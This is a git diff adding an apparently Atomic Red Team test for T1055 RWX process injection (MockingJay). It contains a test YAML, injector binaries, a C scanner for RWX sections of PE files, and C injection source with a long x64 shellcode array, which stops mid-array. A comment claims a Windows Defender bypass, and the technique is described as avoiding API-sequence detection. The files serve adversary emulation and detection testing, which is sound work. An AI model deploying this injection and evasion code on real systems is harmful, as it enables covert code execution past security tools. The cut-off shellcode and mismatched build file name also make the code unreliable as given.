diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index c5a2ee2c7e..6de0d7d9ba 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -129,3 +129,36 @@ atomic_tests: cleanup_command: 'Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force' name: powershell elevation_required: false +- name: Read-Write-Execute process Injection + auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c + description: | + This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode. + The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms + that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread. + The injected shellcode will open a message box and a notepad. + RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes. + More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution. + The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector. + supported_platforms: + - windows + input_arguments: + vuln_dll: + description: vulnerable DLL + type: path + default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll + dependency_executor_name: powershell + dependencies: + - description: | + Utility to inject must exist on disk at specified location (#{vuln_dll}) + prereq_command: | + if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}" + executor: + command: | + $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value + & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address + cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force' + name: powershell + elevation_required: true diff --git a/atomics/T1055/bin/x64/RWXinjectionLocal.exe b/atomics/T1055/bin/x64/RWXinjectionLocal.exe new file mode 100644 index 0000000000..27cc61dfd8 Binary files /dev/null and b/atomics/T1055/bin/x64/RWXinjectionLocal.exe differ diff --git a/atomics/T1055/bin/x64/searchVuln.exe b/atomics/T1055/bin/x64/searchVuln.exe new file mode 100644 index 0000000000..c370eae463 Binary files /dev/null and b/atomics/T1055/bin/x64/searchVuln.exe differ diff --git a/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll b/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll new file mode 100644 index 0000000000..ab784f8306 Binary files /dev/null and b/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll differ diff --git a/atomics/T1055/src/x64/RWXInjection/build.bat b/atomics/T1055/src/x64/RWXInjection/build.bat new file mode 100644 index 0000000000..7af5427143 --- /dev/null +++ b/atomics/T1055/src/x64/RWXInjection/build.bat @@ -0,0 +1 @@ +cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /LocalInjection.c /link Psapi.lib /OUT:RWXinjectionLocal.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 diff --git a/atomics/T1055/src/x64/RWXInjection/path_finder.c b/atomics/T1055/src/x64/RWXInjection/path_finder.c new file mode 100644 index 0000000000..dfcc59d0a5 --- /dev/null +++ b/atomics/T1055/src/x64/RWXInjection/path_finder.c @@ -0,0 +1,207 @@ +/** +Author: Thomas X Meng +The code scans for PE sections with WRX permission. It does it sequentially which +is not as efficient as parallel processing. I did not find a equivalent 3rd lib in C as pefile +Windows defender bypassed, engine Version: 1.1.23100.2009 +**/ + +#include <windows.h> +#include <stdio.h> +#include <wintrust.h> +#include <softpub.h> + +// Define the GUID for WinVerifyTrust action if it is not already defined. +#ifndef WINTRUST_ACTION_GENERIC_VERIFY_V2 +#define WINTRUST_ACTION_GENERIC_VERIFY_V2 \ +{ 0xaac56b, 0xcd44, 0x11d0, { 0x8c, 0xc2, 0x0, 0xc0, 0x4f, 0xc2, 0x95, 0xee } } +#endif + +GUID WVTPolicyGUID = WINTRUST_ACTION_GENERIC_VERIFY_V2; + +#define MAX_SECTION_NAME_LEN 8 + +// Prototypes +const char* GetPEArchitecture(WORD machine); +BOOL IsSigned(LPCWSTR filepath); + +typedef struct { + char name[MAX_SECTION_NAME_LEN + 1]; // Plus null terminator + DWORD offset; + DWORD size; + DWORD raw_size; +} RWXSection; + +// Add this function to check for architecture +const char* GetPEArchitecture(WORD machine) { + switch(machine) { + case IMAGE_FILE_MACHINE_I386: + return "x86"; + case IMAGE_FILE_MACHINE_AMD64: + return "x64"; + // Add other architectures as needed + default: + return "Unknown"; + } +} + +BOOL IsSigned(LPCWSTR filepath) { + LONG lStatus; // Declare lStatus here, once + DWORD dwLastError; + + // Initialize the WINTRUST_FILE_INFO structure. + WINTRUST_FILE_INFO FileData; + memset(&FileData, 0, sizeof(FileData)); + FileData.cbStruct = sizeof(WINTRUST_FILE_INFO); + FileData.pcwszFilePath = filepath; + FileData.hFile = NULL; + FileData.pgKnownSubject = NULL; + + // Initialize the WINTRUST_DATA structure. + WINTRUST_DATA WinTrustData; + memset(&WinTrustData, 0, sizeof(WinTrustData)); + WinTrustData.cbStruct = sizeof(WinTrustData); + WinTrustData.pPolicyCallbackData = NULL; + WinTrustData.pSIPClientData = NULL; + WinTrustData.dwUIChoice = WTD_UI_NONE; + WinTrustData.fdwRevocationChecks = WTD_REVOKE_NONE; + WinTrustData.dwUnionChoice = WTD_CHOICE_FILE; + WinTrustData.dwStateAction = WTD_STATEACTION_VERIFY; + WinTrustData.hWVTStateData = NULL; + WinTrustData.pwszURLReference = NULL; + WinTrustData.dwProvFlags = WTD_USE_DEFAULT_OSVER_CHECK; + WinTrustData.dwUIContext = 0; + WinTrustData.pFile = &FileData; + + // Use the WinVerifyTrust function to check the signature. + lStatus = WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); + + dwLastError = GetLastError(); + + // Any value other than zero indicates that there is no signature. + if (lStatus != ERROR_SUCCESS) { + SetLastError(dwLastError); + WinTrustData.dwStateAction = WTD_STATEACTION_CLOSE; + WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); // Use WVTPolicyGUID + return FALSE; + } + + // Cleanup after the trust verification is done. + WinTrustData.dwStateAction = WTD_STATEACTION_CLOSE; + WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); // Use WVTPolicyGUID again + return TRUE; +} + + +void checkSectionCharacteristics(PIMAGE_SECTION_HEADER section, RWXSection* rwxSection, const char* filePath) { + if ((section->Characteristics & IMAGE_SCN_MEM_EXECUTE) && + (section->Characteristics & IMAGE_SCN_MEM_READ) && + (section->Characteristics & IMAGE_SCN_MEM_WRITE)) { + // Make sure to null-terminate the name + strncpy(rwxSection->name, (const char*)section->Name, IMAGE_SIZEOF_SHORT_NAME); + rwxSection->name[IMAGE_SIZEOF_SHORT_NAME] = '\0'; + + rwxSection->offset = section->VirtualAddress; + rwxSection->size = section->Misc.VirtualSize; + rwxSection->raw_size = section->SizeOfRawData; + + // Print section info with file path + printf("[+] File: %s\n", filePath); + printf("[+] RWX Section Found: %s\n", rwxSection->name); + printf("[+] VirtualAddress (sec offset): 0x%X\n", rwxSection->offset); + printf("[+] VirtualSize: 0x%X\n", rwxSection->size); + printf("[+] SizeOfRawData: 0x%X\n", rwxSection->raw_size); + } +} + + +// Updated ProcessFile function +void ProcessFile(const char* filePath) { + HANDLE hFile = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + printf("[-] Could not open file %s. Error: %d\n", filePath, GetLastError()); + return; + } + + HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL); + if (hMapping == NULL) { + printf("[-] Could not create file mapping for %s. Error: %d\n", filePath, GetLastError()); + CloseHandle(hFile); + return; + } + + LPVOID lpBase = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0); + if (lpBase == NULL) { + printf("[-] Could not map view of file %s. Error: %d\n", filePath, GetLastError()); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)lpBase; + if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { + printf("[-] File %s is not a valid PE file.\n", filePath); + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpBase + dosHeader->e_lfanew); + if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { + printf("[-] File %s is not a valid PE file.\n", filePath); + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + // Print the PE file architecture + printf("[+] Architecture: %s\n", GetPEArchitecture(ntHeaders->FileHeader.Machine)); + + // Check and print if the file is digitally signed + wchar_t wFilePath[MAX_PATH]; + mbstowcs(wFilePath, filePath, MAX_PATH); + printf("[+] Signed: %s\n", IsSigned(wFilePath) ? "Yes" : "No"); + + // Process the sections + PIMAGE_SECTION_HEADER sectionHeaders = IMAGE_FIRST_SECTION(ntHeaders); + RWXSection rwxSection; + + for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; ++i) { + checkSectionCharacteristics(§ionHeaders[i], &rwxSection, filePath); + } + // Cleanup + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); +} + +int main(int argc, char* argv[]) { + if (argc != 2) { + printf("[+] Usage: %s <directory>\n", argv[0]); + return 1; + } + + char* directoryPath = argv[1]; + char searchPath[MAX_PATH]; + snprintf(searchPath, sizeof(searchPath), "%s\\*.*", directoryPath); + + WIN32_FIND_DATA findFileData; + HANDLE hFind = FindFirstFile(searchPath, &findFileData); + + if (hFind == INVALID_HANDLE_VALUE) { + printf("[-] Unable to find files in directory %s. Error is %u\n", directoryPath, GetLastError()); + return 1; + } + + do { + if (!(findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) { + char filePath[MAX_PATH]; + snprintf(filePath, sizeof(filePath), "%s\\%s", directoryPath, findFileData.cFileName); + ProcessFile(filePath); + } + } while (FindNextFile(hFind, &findFileData) != 0); + + FindClose(hFind); + return 0; +} //25519 \ No newline at end of file diff --git a/atomics/T1055/src/x64/RWXInjection/rwx_local.c b/atomics/T1055/src/x64/RWXInjection/rwx_local.c new file mode 100644 index 0000000000..78999813db --- /dev/null +++ b/atomics/T1055/src/x64/RWXInjection/rwx_local.c @@ -0,0 +1,521 @@ +/** +Author: Thomas X Meng +Atomic Red Team +RWX Process Injection code, AKA MockingJay +reference: SecurityJoes, +https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution +No memory allocation or permission settings APIs. +**/ + +#include <windows.h> +#include <psapi.h> +#include <stdio.h> +#include <stdlib.h> + +// Define the structure to hold section information +typedef struct { + LPVOID startSecAddress; + LPVOID endSecAddress; +} SectionDescriptor; + +unsigned char shellcode[] = + { + 0x40,0x55,0x57,0x48,0x81,0xec,0x78,0x05,0x00,0x00, + 0x48,0x8d,0x6c,0x24,0x60,0x65,0x48,0x8b,0x04,0x25, + 0x60,0x00,0x00,0x00,0x48,0x89,0x45,0x00,0x48,0x8b, + 0x45,0x00,0x48,0x8b,0x40,0x18,0x48,0x89,0x45,0x08, + 0x48,0x8b,0x45,0x08,0xc6,0x40,0x48,0x00,0x48,0x8b, + 0x45,0x00,0x48,0x8b,0x40,0x18,0x48,0x83,0xc0,0x20, + 0x48,0x89,0x85,0xb0,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xb0,0x02,0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85, + 0xb8,0x02,0x00,0x00,0x48,0xb8,0x6b,0x00,0x65,0x00, + 0x72,0x00,0x6e,0x00,0x48,0x89,0x45,0x38,0x48,0xb8, + 0x65,0x00,0x6c,0x00,0x33,0x00,0x32,0x00,0x48,0x89, + 0x45,0x40,0x48,0xb8,0x2e,0x00,0x64,0x00,0x6c,0x00, + 0x6c,0x00,0x48,0x89,0x45,0x48,0x48,0xc7,0x45,0x50, + 0x00,0x00,0x00,0x00,0x48,0xc7,0x85,0xd0,0x02,0x00, + 0x00,0x00,0x00,0x00,0x00,0x48,0x8b,0x85,0xb0,0x02, + 0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85,0xb8,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48, + 0x83,0xe8,0x10,0x48,0x89,0x85,0xd8,0x02,0x00,0x00, + 0xc7,0x85,0xe0,0x02,0x00,0x00,0x00,0x00,0x00,0x00, + 0x48,0x8b,0x85,0xd8,0x02,0x00,0x00,0x48,0x8b,0x40, + 0x60,0x48,0x89,0x85,0xc8,0x02,0x00,0x00,0x48,0x8d, + 0x45,0x38,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0xc7, + 0x85,0xe0,0x02,0x00,0x00,0x01,0x00,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7,0x00,0x85, + 0xc0,0x75,0x0f,0xc7,0x85,0xe0,0x02,0x00,0x00,0x00, + 0x00,0x00,0x00,0xe9,0x2e,0x01,0x00,0x00,0x48,0x8b, + 0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88,0x85, + 0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00,0x7e, + 0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7, + 0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00,0xeb,0x46, + 0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83,0xf8,0x41, + 0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83, + 0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4,0x02,0x00, + 0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02,0x00,0x00, + 0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00,0x00,0x88, + 0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe,0x85,0xe5, + 0x02,0x00,0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6,0x00, + 0x88,0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc0, + 0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00, + 0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00, + 0x0f,0xb7,0x00,0x66,0x89,0x85,0xec,0x02,0x00,0x00, + 0xeb,0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83, + 0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00, + 0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4, + 0x02,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02, + 0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00, + 0x00,0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe, + 0x85,0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xec,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x48, + 0x83,0xc0,0x02,0x48,0x89,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83,0xc0, + 0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb7, + 0x85,0xe8,0x02,0x00,0x00,0x0f,0xb7,0x8d,0xec,0x02, + 0x00,0x00,0x3b,0xc1,0x0f,0x84,0xb5,0xfe,0xff,0xff, + 0x83,0xbd,0xe0,0x02,0x00,0x00,0x00,0x0f,0x84,0x2e, + 0x01,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x83,0xe8,0x02,0x48,0x89,0x85,0xc8,0x02,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83, + 0xe8,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88, + 0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00, + 0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f, + 0xb7,0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00,0xeb, + 0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83,0xf8, + 0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00, + 0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4,0x02, + 0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02,0x00, + 0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00,0x00, + 0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe,0x85, + 0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xe8,0x02,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6, + 0x00,0x88,0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00, + 0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0xec,0x02,0x00, + 0x00,0xeb,0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00, + 0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02, + 0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85, + 0xe4,0x02,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5, + 0x02,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02, + 0x00,0x00,0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f, + 0xbe,0x85,0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xec, + 0x02,0x00,0x00,0x0f,0xb7,0x85,0xe8,0x02,0x00,0x00, + 0x0f,0xb7,0x8d,0xec,0x02,0x00,0x00,0x2b,0xc1,0x89, + 0x85,0xe0,0x02,0x00,0x00,0x83,0xbd,0xe0,0x02,0x00, + 0x00,0x00,0x75,0x10,0x48,0x8b,0x85,0xd8,0x02,0x00, + 0x00,0x48,0x89,0x85,0xd0,0x02,0x00,0x00,0xeb,0x25, + 0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b,0x00, + 0x48,0x89,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xb0,0x02,0x00,0x00,0x48,0x39,0x85,0xb8,0x02,0x00, + 0x00,0x0f,0x85,0xf9,0xfc,0xff,0xff,0x48,0x8b,0x85, + 0xd0,0x02,0x00,0x00,0x48,0x89,0x85,0xf0,0x02,0x00, + 0x00,0x48,0xb8,0x6e,0x00,0x74,0x00,0x64,0x00,0x6c, + 0x00,0x48,0x89,0x45,0x38,0x48,0xb8,0x6c,0x00,0x2e, + 0x00,0x64,0x00,0x6c,0x00,0x48,0x89,0x45,0x40,0x48, + 0xc7,0x45,0x48,0x6c,0x00,0x00,0x00,0x48,0xc7,0x45, + 0x50,0x00,0x00,0x00,0x00,0x48,0xc7,0x85,0xf8,0x02, + 0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8b,0x85,0xb0, + 0x02,0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85,0xb8, + 0x02,0x00,0x00,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00, + 0x48,0x83,0xe8,0x10,0x48,0x89,0x85,0x00,0x03,0x00, + 0x00,0xc7,0x85,0x08,0x03,0x00,0x00,0x00,0x00,0x00, + 0x00,0x48,0x8b,0x85,0x00,0x03,0x00,0x00,0x48,0x8b, + 0x40,0x60,0x48,0x89,0x85,0xc8,0x02,0x00,0x00,0x48, + 0x8d,0x45,0x38,0x48,0x89,0x85,0xc0,0x02,0x00,0x00, + 0xc7,0x85,0x08,0x03,0x00,0x00,0x01,0x00,0x00,0x00, + 0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7,0x00, + 0x85,0xc0,0x75,0x0f,0xc7,0x85,0x08,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0xe9,0x2e,0x01,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88, + 0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00, + 0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f, + 0xb7,0x00,0x66,0x89,0x85,0x10,0x03,0x00,0x00,0xeb, + 0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00,0x83,0xf8, + 0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00, + 0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0x0c,0x03, + 0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d,0x03,0x00, + 0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03,0x00,0x00, + 0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f,0xbe,0x85, + 0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x10,0x03,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6, + 0x00,0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85, + 0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00, + 0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0x14,0x03,0x00, + 0x00,0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00, + 0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03, + 0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85, + 0x0c,0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d, + 0x03,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03, + 0x00,0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f, + 0xbe,0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x14, + 0x03,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x83,0xc0,0x02,0x48,0x89,0x85,0xc8,0x02,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83, + 0xc0,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x0f, + 0xb7,0x85,0x10,0x03,0x00,0x00,0x0f,0xb7,0x8d,0x14, + 0x03,0x00,0x00,0x3b,0xc1,0x0f,0x84,0xb5,0xfe,0xff, + 0xff,0x83,0xbd,0x08,0x03,0x00,0x00,0x00,0x0f,0x84, + 0x2e,0x01,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00, + 0x00,0x48,0x83,0xe8,0x02,0x48,0x89,0x85,0xc8,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48, + 0x83,0xe8,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00, + 0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85,0xc8, + 0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00, + 0x00,0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x0f,0xb7,0x00,0x66,0x89,0x85,0x10,0x03,0x00,0x00, + 0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00,0x83, + 0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03,0x00, + 0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0x0c, + 0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d,0x03, + 0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03,0x00, + 0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f,0xbe, + 0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x10,0x03, + 0x00,0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f, + 0xb6,0x00,0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b, + 0x85,0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff, + 0x00,0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0x14,0x03, + 0x00,0x00,0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00, + 0x00,0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c, + 0x03,0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe, + 0x85,0x0c,0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85, + 0x0d,0x03,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c, + 0x03,0x00,0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66, + 0x0f,0xbe,0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85, + 0x14,0x03,0x00,0x00,0x0f,0xb7,0x85,0x10,0x03,0x00, + 0x00,0x0f,0xb7,0x8d,0x14,0x03,0x00,0x00,0x2b,0xc1, + 0x89,0x85,0x08,0x03,0x00,0x00,0x83,0xbd,0x08,0x03, + 0x00,0x00,0x00,0x75,0x10,0x48,0x8b,0x85,0x00,0x03, + 0x00,0x00,0x48,0x89,0x85,0xf8,0x02,0x00,0x00,0xeb, + 0x25,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b, + 0x00,0x48,0x89,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b, + 0x85,0xb0,0x02,0x00,0x00,0x48,0x39,0x85,0xb8,0x02, + 0x00,0x00,0x0f,0x85,0xf9,0xfc,0xff,0xff,0x48,0x8b, + 0x85,0xd0,0x02,0x00,0x00,0x48,0x8b,0x40,0x30,0x48, + 0x89,0x85,0x18,0x03,0x00,0x00,0x48,0x8b,0x85,0x18, + 0x03,0x00,0x00,0x48,0x63,0x40,0x3c,0x48,0x8b,0x8d, + 0x18,0x03,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1, + 0x48,0x89,0x85,0x20,0x03,0x00,0x00,0xb8,0x08,0x00, + 0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x8d,0x20, + 0x03,0x00,0x00,0x8b,0x84,0x01,0x88,0x00,0x00,0x00, + 0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48,0x03,0xc8, + 0x48,0x8b,0xc1,0x48,0x89,0x85,0x28,0x03,0x00,0x00, + 0x48,0x8b,0x85,0x28,0x03,0x00,0x00,0x8b,0x40,0x20, + 0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48,0x03,0xc8, + 0x48,0x8b,0xc1,0x48,0x89,0x85,0x30,0x03,0x00,0x00, + 0x48,0xb8,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41, + 0x48,0x89,0x45,0x10,0xc7,0x85,0x38,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0x48,0x63,0x85,0x38,0x03,0x00, + 0x00,0x48,0x8b,0x8d,0x30,0x03,0x00,0x00,0x48,0x63, + 0x04,0x81,0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48, + 0x8b,0x55,0x10,0x48,0x39,0x14,0x01,0x74,0x10,0x8b, + 0x85,0x38,0x03,0x00,0x00,0xff,0xc0,0x89,0x85,0x38, + 0x03,0x00,0x00,0xeb,0xcd,0x48,0x8b,0x85,0x28,0x03, + 0x00,0x00,0x8b,0x40,0x24,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x40,0x03,0x00,0x00,0x48,0x8b,0x85,0x28,0x03, + 0x00,0x00,0x8b,0x40,0x1c,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x48,0x03,0x00,0x00,0x48,0x63,0x85,0x38,0x03, + 